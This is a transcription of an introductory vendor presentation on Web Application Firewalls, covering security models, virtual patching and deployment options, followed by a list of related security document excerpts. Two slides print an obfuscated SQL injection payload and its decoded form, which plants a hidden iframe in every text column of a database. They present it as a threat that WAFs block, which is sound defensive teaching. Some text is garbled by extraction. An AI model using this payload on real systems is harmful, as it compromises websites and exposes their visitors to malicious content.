Introduction to Web Application Firewalls. Dustin Anders
|
|
|
- Aubrey Wood
- 10 years ago
- Views:
Transcription
1 Introduction to Web Application Firewalls Dustin Anders
2 Today s Presenter Dustin Anders, CISSP Senior Security Engineer w/ Imperva Implemented security solutions for large enterprises since 1997 (State Farm, Anheuser-Busch, etc). Enjoy building websites, PHP/Perl applications, automation Co-founder of Slashmail (it sits behind a WAF).
3 Disclaimer I work for Imperva. A few references (screenshots) exist in the presentation to Imperva s WAF. These references are not meant to sell you a solution but to explain a specific concept.
4 Agenda What is a Web Application Firewall (WAF)? Features & Functionality What is the difference between WAFs and? WAF Drivers Deployment Options Implementation Considerations WAF Market Overview Short WAF Demo Q/A 4
5 What is a Web Application Firewall? A software or hardware solution that protects your web enabled applications from threats/attacks. The solution must understand web protection at the application layer (HTTP and HTTPS conversations to your web applications, XML/SOAP, and Web Services). Detect/prevent OWASP Top Ten Threats. Many solutions learn about the web applications they protect. 5
6 What is a Web Application Firewall? Sample of web application & common attacks prevented by WAFs: 6
7 What is a WAF Security Models Good Positive Security Model Model the application Automatically created Automatically updated as web application grows and changes over time Enforcement Allow traffic clearly within positive security model Suspicious Bad Negative Security Model Signatures of recognized attack techniques Regularly updated with new attack techniques Enforcement Block traffic clearly identified by negative security model Correlate multiple behaviors to block complex attacks. Web application security must address the complexity of gray traffic
8 What is a WAF Learning Example WAF models applications, including field type & length Signatures identify suspicious web requests Identifies attacks, like SQL injection, OS command injection, XSS, by correlating a profile violation and signatures Continue to learn
9 Features of WAFs Understanding HTTP/XML HTTP protocol support + Understands 1.0, 1.1 protocols + Header information + Field content, length, etc XML/SOAP support + XML parsing & element enforcement + SOAP element support & validation + Xpath & SQL Injection Anti-evasion + Decoding & path standardization SSL Decryption / Inspection 9
10 Features of WAFs Building Blocks Signatures + Network (DNS exploits, Solaris/Linux specific, ) + Generic attack (directory traversal, web-cgi, web-php, ) + Known web application vulnerabilities (CVE defined web app vulnerabilities, wikis, phpmyexplorer, ) Policy engine + Supports alerting based on signatures, user/session information, TCP/IP elements, time of day, occurrences, operation, etc. + Blocking or auditing or notification (SNMP, syslog, etc) 10
11 Features of WAFs Auditing/Alerting Bringing visibility into web traffic Capturing the full web conversation Understanding of web application attacks Understanding of individual user access Typically, tied into the policy engine for granular auditing of specific flows Brings visibility into performance of web applications (response time, broken links, etc) Useful business intelligence 11
12 Features of WAFs Protection Form field protection + Hidden static fields are prevented from changing + Lengths, types, character sets are enforced Cookie protection + WAF can broker entire cookie + Encryption / signing Session management protection + WAF can broker entire session + Force session parameters Brute force protection DoS / DDoS protection 12
13 Features of WAFs Virtual Patching Applying protection to a web application vulnerability on the WAF by either: + Adding a new signature or policy to prevent the vulnerability Or + Importing web scanner vulnerability findings into the WAF for policy remediation. 13
14 Virtual Patching Reduces Window of Exposure Block attempts to exploit known vulnerabilities Shorten the window of exposure while patches are thoroughly tested and deployed Vulnerability identified Patch available and tested for deployment System protected Vulnerability Virtual Patch identified System protected
15 WAF and Secure Web Development Software Development Lifecycle DESIGN & CODE Architect and implement code Fix errors and vulnerabilities WAF Manual processes or other tools TEST DEPLOY Test for vulnerabilities Block attacks Virtually patch vulnerabilities Detect leaks, errors Monitor and report exploits
16 Features of WAFs Network Features SSL Acceleration Non-transparent / privacy Connection pooling User authentication Redirections 16
17 Features of WAFs Advanced Features Event Correlation User Tracking Discovery and Classification Reputation Controls Anti-Phishing Controls DLP Database Integration 17
18 Features of WAFs Other Features Reporting SIEM Integration Change management integration Monitoring Centralized management Auto Update Data Masking 18
19 What is the difference between WAFs and First generation firewalls (stateful inspection & proxy) : + Some inspect HTTP and decrypt HTTPS, however protocol analysis only. Protocol filtering, header filtering, URL filtering etc are available. Next Generation firewalls: + McAfee Sidewinder, Palo Alto Networks, etc concentrate on application stream signatures which work well for outbound/ Internet traffic very little inbound web server protection. Network IDS/IPS: + Broad network inspection support around TCP/IP, focus is wide, typically extension based for deeper understanding of HTTP. Typically, signature based. No user, session awareness. 19
20 WAF Drivers PCI 20
21 PCI DSS Mandates Web Application Security Enforcing best practices, PCI DSS #6.6 sets forth Web app security requirements
22 WAF Drivers
23 WAF Drivers - OWASP Top Ten (2010 Edition)
24 WAF Drivers - OWASP Top Ten (2010 Edition) Percentage likelihood of a website having a vulnerability by class
25 WAF Drivers Secure Code Findings Most Web applica.ons aren t being protected at even the most minimal levels + Secure code requires extra effort; results can be hard to measure so it s o>en not done + Developers aren t incen.vized to develop secure code; rather, develop it quickly + It takes more.me and money and requires skills that the current team might not have + Few consider audit & security when sizing hardware
26 WAF Drivers Virtual Patching What we ideally would like to do: + Fix the code and redeploy application Input sanitation Use of prepared statements What happens in reality: + It takes a lot of time to fix application code (for example it takes Oracle 9 18 months to release a fix for SQL injection vulnerabilities in built-in stored procedures) + Applications contain 3 rd party components and legacy components whose code cannot be actually fixed within a controlled time frame + Applications cannot be taken down until a they are fixed + Application developers do not have security development expertise. GL
27 WAF Drivers - The Industrializa.on of Hacking Roles Automa9on Hacking is a Profitable Industry Op9miza9on Researching Vulnerabili.es Developing Exploits Growing Botnets Exploi.ng Targets Consuming Direct Value i.e. IP, PII, CCN Command & Control Malware Distribu.on Phishing & spam DDoS Blackhat SEO Growing Botnets and Exploi.ng Vulnerabili.es Selec.ng Targets via Search Engines Templates & Kits Centralized Management Service Model 27
28 WAF Drivers The Industrializa.on of Hacking Web a>acks are becoming more advanced 28
29 WAF Drivers - New Threats SQL Obfuscation Hide SQL Injection statements with encoding: declare%20@s%20varchar(4000);set%20@s=cast (0x c c c c455f f f f c e6e616d652c622e6e614d f4d f626a c f4c754d4e e69643d422e e e d e e d f e d f e d f e d f50454e c655f f e f6d c455f f e744f c c f d e b272b40742b275d b27 2b40632b275d3d d28434f4e c5b272b40432b275d29292b e f6d c655f f e744f c e c6f c455f f c4c6f c655f f7220%20as%20varchar (4000));exec(@s);-- Decodes to: varchar(255),@c varchar(255) declare table_cursor CURSOR FoR SELECt A.name,b.naMe from sysobjects a,syscolumns b where a.id=b.id and A.XtYPe='U' and (b.xtype=99 or b.xtype=35 or B.xTYPe=231 OR b.xtype=167) open TAbLe_cuRsor fetch next FROm TaBlE_CuRsOr while (@@FetCh_stAtuS=0) begin exec('update ['+@t+'] SeT ['+@c+']=rtrim(convert (VARCHAr(4000),['+@C+']))+caST (0x3C D D A2F2F6E656D6F C E2 E72752F F676F2E F D D D C653D C61793A6E6F6E65223E3C2F D653E as varchar(106))') FETCh Next from table_cursor EnD Close table_cursor deallocate TaBLe_CURsor 29
30 WAF Drivers - New Threats SQL Obfuscation - Continued CAST Statement decodes to: <iframe src=" width="0" height="0" style="display:none"></iframe> Inserts iframe in every varchar column in the backend database Very successful attack Stopped dead by a modern WAF 30
31 Deployment Options: Layer 2 Bridge Notes: Clients point at web servers Clients not aware of WAF WAF bridges traffic layer 2 WAF has copies of SSL keys Pros: Transparent Easy to deploy High performance Cons: Features are not available: User Authentication URL rewriting
32 Deployment Options: Layer 3 Transparent Proxy Notes: Clients point at web servers Clients not aware of WAF WAF routes traffic at layer 3 Pros: Transparent Easy to deploy Network features are available (pooling, caching) Cons: More overhead Lacks some features: Re-writing User authentication
33 Deployment Options: Reverse Proxy Notes: Clients point at WAF WAF routes traffic at layer 3 Pros: All features available Hides the internal components of the site Extends DMZ Cons: Increased latency Harder to install Lacks fail open for HA
34 Deployment Options: Monitoring Mode Notes: Clients point at web servers WAF monitors via a span port or network TAP Pros: Easy deployment Ideal for pilots and tests No latency Cons: Blocking is available but via TCP resets. Some features are not available
35 Deployment Options: Server Mode Notes: Clients point at web servers WAF protects via a plug-in, service module, application on the web servers Pros: Easy deployment Cons: Consumes web server resources Some features are not available Requires tight change controls
36 Implementation Considerations Deploy in a non-block mode, monitoring only + Helps with tuning any false positives/negatives + Monitoring mode will give learning WAFs time to understand application Integrate solution into your software development lifecycle Integrate solution with logging, monitoring and workflow infrastructures 36
37 WAF Market Overview Solution List Armorlogic Profense Array Networks Webwall Art of Defence dwaf Barracuda WAF Bee Ware i-sentry Citrix Netscaler F5 ASM Imperva SecureSphere jetnexus ModSecurity (OS) Radware AppWall Privacyware ThreatSentry Protegrity Trustwave Breach Market is comprised of a mix of server and network solutions. Some are add-ins on top of existing functionality and others are specialized. 37
38 Who is Imperva Market Leading WAF A Data Security Company + Founded in 2002 by Check Point Founder Headquartered in Redwood Shores, CA Growing in R&D, Support, Sales/ Channel, and PS Installed in 50+ Countries 5,000+ direct with 25,000 cloudprotected customers of of of of the the the the top top top top US banks Telecoms specialty retailers food & drug stores
39 More Informa.on: WAF Web Applica.on Firewall Evalua.on Criteria: h\p://projects.webappsec.org/web- Applica.on- Firewall- Evalua.on- Criteria WAF Market Informa.on: h\p:// More Informa.on on Imperva: Website YouTube BC
40 Demo Setup Web Browser (Chrome - Laptop) VMware Network 8 SuperVeda - ecommerce (VMware) Tomcat, MySQL Simple SQL Injec.on to login Exploit shopping cart logic / Web App Parm Tampering XSS Injec.on Example 40
41 41 Q/A
42 Thank You Send Questions:
Web Application Security. Radovan Gibala Senior Field Systems Engineer F5 Networks [email protected]
Web Application Security Radovan Gibala Senior Field Systems Engineer F5 Networks [email protected] Security s Gaping Hole 64% of the 10 million security incidents tracked targeted port 80. Information Week
Imperva s Response to Information Supplement to PCI DSS Requirement Section 6.6
Imperva Technical Brief Imperva s Response to Information Supplement to PCI DSS Requirement Section 6.6 The PCI Security Standards Council s (PCI SSC) recent issuance of an Information Supplement piece
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
Implementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
Contemporary Web Application Attacks. Ivan Pang Senior Consultant Edvance Limited
Contemporary Web Application Attacks Ivan Pang Senior Consultant Edvance Limited Agenda How Web Application Attack impact to your business? What are the common attacks? What is Web Application Firewall
NSFOCUS Web Application Firewall White Paper
White Paper NSFOCUS Web Application Firewall White Paper By NSFOCUS White Paper - 2014 NSFOCUS NSFOCUS is the trademark of NSFOCUS Information Technology Co., Ltd. NSFOCUS enjoys all copyrights with respect
Botnet-Powered SQL Injection Attacks A Deeper Look Within (VB, Sep. 2009) David Maciejak Guillaume Lovet
Botnet-Powered SQL Injection Attacks A Deeper Look Within (VB, Sep. 2009) David Maciejak Guillaume Lovet Agenda 1 2 3 The Beginning Attack Analysis Malicious Injected JS 4 Threat Evolution 5 Prevention
10 Things Every Web Application Firewall Should Provide Share this ebook
The Future of Web Security 10 Things Every Web Application Firewall Should Provide Contents THE FUTURE OF WEB SECURITY EBOOK SECTION 1: The Future of Web Security SECTION 2: Why Traditional Network Security
Basic & Advanced Administration for Citrix NetScaler 9.2
Basic & Advanced Administration for Citrix NetScaler 9.2 Day One Introducing and deploying Citrix NetScaler Key - Brief Introduction to the NetScaler system Planning a NetScaler deployment Deployment scenarios
STOPPING LAYER 7 ATTACKS with F5 ASM. Sven Müller Security Solution Architect
STOPPING LAYER 7 ATTACKS with F5 ASM Sven Müller Security Solution Architect Agenda Who is targeted How do Layer 7 attacks look like How to protect against Layer 7 attacks Building a security policy Layer
How To Protect Your Web Applications From Attack From A Malicious Web Application From A Web Attack
An Accurate and Effective Approach to Protecting and Monitoring Web Applications White Paper Web applications have lowered costs and increased revenue by extending the enterprise s strategic business systems
Mingyu Web Application Firewall (DAS- WAF) - - - All transparent deployment for Web application gateway
Mingyu Web Application Firewall (DAS- WAF) - - - All transparent deployment for Web application gateway All transparent deployment Full HTTPS site defense Prevention of OWASP top 10 Website Acceleration
SANS Top 20 Critical Controls for Effective Cyber Defense
WHITEPAPER SANS Top 20 Critical Controls for Cyber Defense SANS Top 20 Critical Controls for Effective Cyber Defense JANUARY 2014 SANS Top 20 Critical Controls for Effective Cyber Defense Summary In a
How To Protect A Web Application From Attack From A Trusted Environment
Standard: Version: Date: Requirement: Author: PCI Data Security Standard (PCI DSS) 1.2 October 2008 6.6 PCI Security Standards Council Information Supplement: Application Reviews and Web Application Firewalls
FortiWeb 5.0, Web Application Firewall Course #251
FortiWeb 5.0, Web Application Firewall Course #251 Course Overview Through this 1-day instructor-led classroom or online virtual training, participants learn the basic configuration and administration
The New PCI Requirement: Application Firewall vs. Code Review
The New PCI Requirement: Application Firewall vs. Code Review The Imperva SecureSphere Web Application Firewall meets the new PCI requirement for an application layer firewall. With the highest security
Protect the data that drives our customers business. Data Security. Imperva s mission is simple:
The Imperva Story Who We Are Imperva is the global leader in data security. Thousands of the world s leading businesses, government organizations, and service providers rely on Imperva solutions to prevent
THE SMARTEST WAY TO PROTECT WEBSITES AND WEB APPS FROM ATTACKS
THE SMARTEST WAY TO PROTECT WEBSITES AND WEB APPS FROM ATTACKS INCONVENIENT STATISTICS 70% of ALL threats are at the Web application layer. Gartner 73% of organizations have been hacked in the past two
Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper
Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper Securing Web Applications As hackers moved from attacking the network to attacking the deployed applications, a category
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
FortiWeb for ISP. Web Application Firewall. Copyright Fortinet Inc. All rights reserved.
FortiWeb for ISP Web Application Firewall Copyright Fortinet Inc. All rights reserved. Agenda Introduction to FortiWeb Highlights Main Features Additional FortiWEB Services for the ISP FortiWeb Family
Arrow ECS University 2015 Radware Hybrid Cloud WAF Service. 9 Ottobre 2015
Arrow ECS University 2015 Radware Hybrid Cloud WAF Service 9 Ottobre 2015 Get to Know Radware 2 Our Track Record Company Growth Over 10,000 Customers USD Millions 200.00 150.00 32% 144.1 16% 167.0 15%
Advanced Administration for Citrix NetScaler 9.0 Platinum Edition
Advanced Administration for Citrix NetScaler 9.0 Platinum Edition Course Length: 5 Days Course Code: CNS-300 Course Description This course provides the foundation to manage, configure and monitor advanced
NSFOCUS Web Application Firewall
NSFOCUS Web Application Firewall 1 / 9 Overview Customer Benefits Mitigate Data Leakage Risk Ensure Availability and QoS of Websites Close the Gap for PCI DSS Compliance Collaborative Security The NSFOCUS
Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified
Standard: Data Security Standard (DSS) Requirement: 6.6 Date: February 2008 Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified Release date: 2008-04-15 General PCI
SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever. Dana Tamir, Product Marketing Manager, Imperva
SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever Dana Tamir, Product Marketing Manager, Imperva Consider this: In the first half of 2008, SQL injection was the number one attack vector
F5 ASM i DB Monitoring w ofercie NASK
F5 ASM i DB Monitoring w ofercie NASK Impacting People s Daily Lives F5 is Everywhere 2 3 Agenda Security What are the challenges Operation Efficiency using a ADC Database and Application Monitoring Round
Barracuda Web Site Firewall Ensures PCI DSS Compliance
Barracuda Web Site Firewall Ensures PCI DSS Compliance E-commerce sales are estimated to reach $259.1 billion in 2007, up from the $219.9 billion earned in 2006, according to The State of Retailing Online
End-to-End Application Security from the Cloud
Datasheet Website Security End-to-End Application Security from the Cloud Unmatched web application security experience, enhanced by real-time big data analytics, enables Incapsula to provide best-of-breed
Guidelines for Web applications protection with dedicated Web Application Firewall
Guidelines for Web applications protection with dedicated Web Application Firewall Prepared by: dr inŝ. Mariusz Stawowski, CISSP Bartosz Kryński, Imperva Certified Security Engineer INTRODUCTION Security
Concierge SIEM Reporting Overview
Concierge SIEM Reporting Overview Table of Contents Introduction... 2 Inventory View... 3 Internal Traffic View (IP Flow Data)... 4 External Traffic View (HTTP, SSL and DNS)... 5 Risk View (IPS Alerts
WEB APPLICATION FIREWALLS: DO WE NEED THEM?
DISTRIBUTING EMERGING TECHNOLOGIES, REGION-WIDE WEB APPLICATION FIREWALLS: DO WE NEED THEM? SHAIKH SURMED Sr. Solutions Engineer [email protected] www.fvc.com HAVE YOU BEEN HACKED????? WHAT IS THE PROBLEM?
Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper
Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks Whitepaper The security industry has extensively focused on protecting against malicious injection attacks like
IJMIE Volume 2, Issue 9 ISSN: 2249-0558
Survey on Web Application Vulnerabilities Prevention Tools Student, Nilesh Khochare* Student,Satish Chalurkar* Professor, Dr.B.B.Meshram* Abstract There are many commercial software security assurance
SSL Inspection Step-by-Step Guide. June 6, 2016
SSL Inspection Step-by-Step Guide June 6, 2016 Key Drivers for Inspecting Outbound SSL Traffic Eliminate blind spots of SSL encrypted communication to/from the enterprise Maintaining information s communication
From the Bottom to the Top: The Evolution of Application Monitoring
From the Bottom to the Top: The Evolution of Application Monitoring Narayan Makaram, CISSP Director, Security Solutions HP/Enterprise Security Business Unit Session ID: SP01-202 Session 2012 Classification:
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
Web Application Firewalls: When Are They Useful? OWASP AppSec Europe May 2006. The OWASP Foundation http://www.owasp.org/
Web Application Firewalls: When Are They Useful? OWASP AppSec Europe May 2006 Ivan Ristic Thinking Stone [email protected] +44 7766 508 210 Copyright 2006 - The OWASP Foundation Permission is granted
Imperva Cloud WAF. How to Protect Your Website from Hackers. Hackers. *Bots. Legitimate. Your Websites. Scrapers. Comment Spammers
How to Protect Your from Hackers Web attacks are the greatest threat facing organizations today. In the last year, Web attacks have brought down businesses of all sizes and resulted in massive-scale data
Networking and High Availability
yeah SecureSphere Deployment Note Networking and High Availability Imperva SecureSphere appliances support a broad array of deployment options, enabling seamless integration into any data center environment.
From Rivals to BFF: WAF & VA Unite OWASP 07.23.2009. The OWASP Foundation http://www.owasp.org
From Rivals to BFF: WAF & VA Unite 07.23.2009 Brian Contos, Chief Security Strategist Imperva Inc. [email protected] +1 (650) 832.6054 Copyright The Foundation Permission is granted to copy, distribute
全 球 資 安 剖 析, 您 做 確 實 了 嗎? Albert Yung Barracuda Networks
全 球 資 安 剖 析, 您 做 確 實 了 嗎? Albert Yung Barracuda Networks Agenda Challenges and PCI DSS 3.0 Updates Personal Information Protection Act Strategy to Protect against leak of Confidential Personal and Corporate
White Paper. Protecting Databases from Unauthorized Activities Using Imperva SecureSphere
Protecting Databases from Unauthorized Activities Using Imperva SecureSphere White Paper As the primary repository for the enterprise s most valuable information, the database is perhaps the most sensitive
The Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions [email protected] Agenda Current State of Web Application Security Understanding
Information Technology Policy
Information Technology Policy Enterprise Web Application Firewall ITP Number ITP-SEC004 Category Recommended Policy Contact [email protected] Effective Date January 15, 2010 Supersedes Scheduled Review
Web Application Firewall
Web Application Firewall Getting Started Guide August 3, 2015 Copyright 2014-2015 by Qualys, Inc. All Rights Reserved. Qualys and the Qualys logo are registered trademarks of Qualys, Inc. All other trademarks
WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
CIS 433/533 - Computer and Network Security. Web Vulnerabilities, Wrapup
CIS 433/533 - Computer and Network Security Web Vulnerabilities, Wrapup Professor Kevin Butler Winter 2011 Computer and Information Science Injection Attacks flaws relating to invalid input handling which
Website Security. End-to-End Application Security from the Cloud. Cloud-Based, Big Data Security Approach. Datasheet: What You Get. Why Incapsula?
Datasheet: Website Security End-to-End Application Security from the Cloud Unmatched web application security experience, enhanced by real-time big data analytics, enables Incapsula to provide best-ofbreed
Playing with Web Application Firewalls
Playing with Web Application Firewalls Who is Wendel? Independent penetration test analyst. Affiliated to Hackaholic team. Over 7 years in the security industry. Discovered vulnerabilities in Webmails,
1 Copyright 2012, Oracle and/or its affiliates. All rights reserved. Public Information
1 Copyright 2012, Oracle and/or its affiliates. All rights reserved. Public Information The following is intended to outline our general product direction. It is intended for information purposes only,
Semantic based Web Application Firewall (SWAF V 1.6) Operations and User Manual. Document Version 1.0
Semantic based Web Application Firewall (SWAF V 1.6) Operations and User Manual Document Version 1.0 Table of Contents 1 SWAF... 4 1.1 SWAF Features... 4 2 Operations and User Manual... 7 2.1 SWAF Administrator
White Paper Secure Reverse Proxy Server and Web Application Firewall
White Paper Secure Reverse Proxy Server and Web Application Firewall 2 Contents 3 3 4 4 8 Losing control Online accessibility means vulnerability Regain control with a central access point Strategic security
What is Web Security? Motivation
[email protected] http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
Networking for Caribbean Development
Networking for Caribbean Development BELIZE NOV 2 NOV 6, 2015 w w w. c a r i b n o g. o r g N E T W O R K I N G F O R C A R I B B E A N D E V E L O P M E N T BELIZE NOV 2 NOV 6, 2015 w w w. c a r i b n
Enterprise-Grade Security from the Cloud
Datasheet Website Security Enterprise-Grade Security from the Cloud Unmatched web application security experience, enhanced by real-time big data analytics, enables Incapsula to provide best-of-breed security
Web Application Firewalls: What the vendors do NOT want you to know. The OWASP Foundation http://www.owasp.org
Web Application Firewalls: What the vendors do NOT want you to know Sandro Gauci EnableSecurity [email protected] nd Wendel G. Henrique Trustwave [email protected] Copyright The OWASP Foundation
Akamai to Incapsula Migration Guide
Guide Akamai to Incapsula Migration Guide Introduction Incapsula is an enterprise-grade cloud service that helps companies deliver applications more efficiently and securely. This is accomplished through
Introduction: 1. Daily 360 Website Scanning for Malware
Introduction: SiteLock scans your website to find and fix any existing malware and vulnerabilities followed by using the protective TrueShield firewall to keep the harmful traffic away for good. Moreover
Powered by. Incapsula Cloud WAF
Powered by Incapsula Cloud WAF Enero - 2013 Incapsula Cloud WAF Overview Incapsula Cloud WAF Delivery Model Threat Central 360 Global Threat Detection & Analysis Enables early detection across the entire
Hayri Tarhan, Sr. Manager, Public Sector Security, Oracle Ron Carovano, Manager, Business Development, F5 Networks
EXTENDING ACCESS WHILE ENHANCING CONTROL FOR YOUR ORGANIZATION S DATA LEVERAGE THE POWER OF F5 AND ORACLE TO DELIVER SECURE ACCESS TO APPLICATIONS AND DATABASES Hayri Tarhan, Sr. Manager, Public Sector
Cutting the Cost of Application Security
WHITE PAPER Cutting the Cost of Application Security Web application attacks can result in devastating data breaches and application downtime, costing companies millions of dollars in fines, brand damage,
Application Security Best Practices. Wally LEE <[email protected]> Principal Consultant
Application Security Best Practices Wally LEE Principal Consultant 17/18 March 2009 Speaker Profile Wally LEE CISSP BS7799 Lead Auditor Certified Ultimate Hacking Instructor Certified
Enterprise Buyer Guide
Enterprise Buyer Guide Umbrella s Secure Cloud Gateway vs. Web Proxies or Firewall Filters Evaluating usability, performance and efficacy to ensure that IT teams and end users will be happy. Lightweight
Blind as a Bat? Supporting Packet Decryption for Security Scanning
Sponsored by VSS Monitoring Blind as a Bat? Supporting Packet Decryption for Security Scanning November 2012 A SANS Whitepaper Written by: Dave Shackleford Options for SSL Inspection Page 2 Implementing
Introduction to Computer Security Benoit Donnet Academic Year 2015-2016
Introduction to Computer Security Benoit Donnet Academic Year 2015-2016 1 Agenda Networking Chapter 1: Firewalls Chapter 2: Proxy Chapter 3: Intrusion Detection System Chapter 4: Network Attacks Chapter
IT Security Conference Romandie - Barracuda Securely Publishing Web Application a field dedicated to expert only?
IT Security Conference Romandie - Barracuda Securely Publishing Web Application a field dedicated to expert only? Antoine Donzé Sales Engineer Switzerland & North Africa Mid-market organizations are increasingly
Gateway Security at Stateful Inspection/Application Proxy
Gateway Security at Stateful Inspection/Application Proxy Michael Lai Sales Engineer - Secure Computing Corporation MBA, MSc, BEng(Hons), CISSP, CISA, BS7799 Lead Auditor (BSI) Agenda Who is Secure Computing
F5 Silverline Web Application Firewall Onboarding: Technical Note
F5 Silverline Web Application Firewall Onboarding: Technical Note F5 Silverline Web Application Firewall Onboarding With organizations transitioning application workloads to the cloud, traditional centralized
White Paper. Managing Risk to Sensitive Data with SecureSphere
Managing Risk to Sensitive Data with SecureSphere White Paper Sensitive information is typically scattered across heterogeneous systems throughout various physical locations around the globe. The rate
Networking and High Availability
TECHNICAL BRIEF Networking and High Availability Deployment Note Imperva appliances support a broad array of deployment options, enabling seamless integration into any data center environment. can be configured
Securing and Accelerating Databases In Minutes using GreenSQL
Securing and Accelerating Databases In Minutes using GreenSQL Unified Database Security All-in-one database security and acceleration solution Simplified management, maintenance, renewals and threat update
How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
Barracuda Intrusion Detection and Prevention System
Providing complete and comprehensive real-time network protection Today s networks are constantly under attack by an ever growing number of emerging exploits and attackers using advanced evasion techniques
Decryption. Palo Alto Networks. PAN-OS Administrator s Guide Version 6.0. Copyright 2007-2015 Palo Alto Networks
Decryption Palo Alto Networks PAN-OS Administrator s Guide Version 6.0 Contact Information Corporate Headquarters: Palo Alto Networks 4401 Great America Parkway Santa Clara, CA 95054 www.paloaltonetworks.com/company/contact-us
Reducing Application Vulnerabilities by Security Engineering
Reducing Application Vulnerabilities by Security Engineering - Subash Newton Manager Projects (Non Functional Testing, PT CoE Group) 2008, Cognizant Technology Solutions. All Rights Reserved. The information
Web Application Firewall Data Security Solutions. Cloud Firewall
Web Application Firewall Data Security Solutions Cloud Firewall PORTAFOLIO DE PRODUCTOS Seguridad para la Nube Cloud is just another IT Deployment Model Physical Virtual Private Cloud (On-Premise) Public
McAfee Web Gateway Administration Intel Security Education Services Administration Course Training
McAfee Web Gateway Administration Intel Security Education Services Administration Course Training The McAfee Web Gateway Administration course from Education Services provides an in-depth introduction
BeyondInsight Version 5.6 New and Updated Features
BeyondInsight Version 5.6 New and Updated Features BeyondInsight 5.6 Expands Risk Visibility Across New Endpoint, Cloud and Firewall Environments; Adds Proactive Threat Alerts The BeyondInsight IT Risk
Strategic Information Security. Attacking and Defending Web Services
Security PS Strategic Information Security. Attacking and Defending Web Services Presented By: David W. Green, CISSP [email protected] Introduction About Security PS Application Security Assessments
Importance of Web Application Firewall Technology for Protecting Web-based Resources
Importance of Web Application Firewall Technology for Protecting Web-based Resources By Andrew J. Hacker, CISSP, ISSAP Senior Security Analyst, ICSA Labs January 10, 2008 ICSA Labs 1000 Bent Creek Blvd.,
Playing with Web Application Firewalls
Playing with Web Application Firewalls DEFCON 16, August 8-10, 2008, Las Vegas, NV, USA Who is Wendel Guglielmetti Henrique? Penetration Test analyst at SecurityLabs - Intruders Tiger Team Security division
Barracuda Web Application Firewall
Barracuda Networks Technical Documentation Barracuda Web Application Firewall Administrator s Guide Version 7.6 RECLAIM YOUR NETWORK Copyright Notice Copyright (c) 2004-2011, Barracuda Networks, Inc.,
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
FISMA / NIST 800-53 REVISION 3 COMPLIANCE
Mandated by the Federal Information Security Management Act (FISMA) of 2002, the National Institute of Standards and Technology (NIST) created special publication 800-53 to provide guidelines on security
WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL Ensuring Compliance for PCI DSS 6.5 and 6.6 CONTENTS 04 04 06 08 11 12 13 Overview Payment Card Industry Data Security Standard PCI Compliance for Web Applications
Load Balancing Security Gateways WHITE PAPER
Load Balancing Security Gateways WHITE PAPER Table of Contents Acceleration and Optimization... 4 High Performance DDoS Protection... 4 Web Application Firewall... 5 DNS Application Firewall... 5 SSL Insight...
NetScaler: A comprehensive replacement for Microsoft Forefront Threat Management Gateway
NetScaler: A comprehensive replacement for Microsoft Forefront Threat Management Gateway 2 Microsoft s Forefront Threat Management Gateway (TMG) is a network security and protection solution for enterprise
PCI DSS 3.0 Compliance
A Trend Micro White Paper April 2014 PCI DSS 3.0 Compliance How Trend Micro Cloud and Data Center Security Solutions Can Help INTRODUCTION Merchants and service providers that process credit card payments
Production Security and the SDLC. Mark Kraynak Sr. Dir. Strategic Marketing Imperva [email protected]
Production Security and the SDLC Mark Kraynak Sr. Dir. Strategic Marketing Imperva [email protected] Building Security Into the Development Process Production Test existing deployed apps Eliminate security
IBM. Vulnerability scanning and best practices
IBM Vulnerability scanning and best practices ii Vulnerability scanning and best practices Contents Vulnerability scanning strategy and best practices.............. 1 Scan types............... 2 Scan duration
Sitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
Application Security Testing
Tstsec - Version: 1 09 July 2016 Application Security Testing Application Security Testing Tstsec - Version: 1 4 days Course Description: We are living in a world of data and communication, in which the
Applications and data are the main targets for modern attacks. Adoption of dedicated application and data security concepts, technologies and
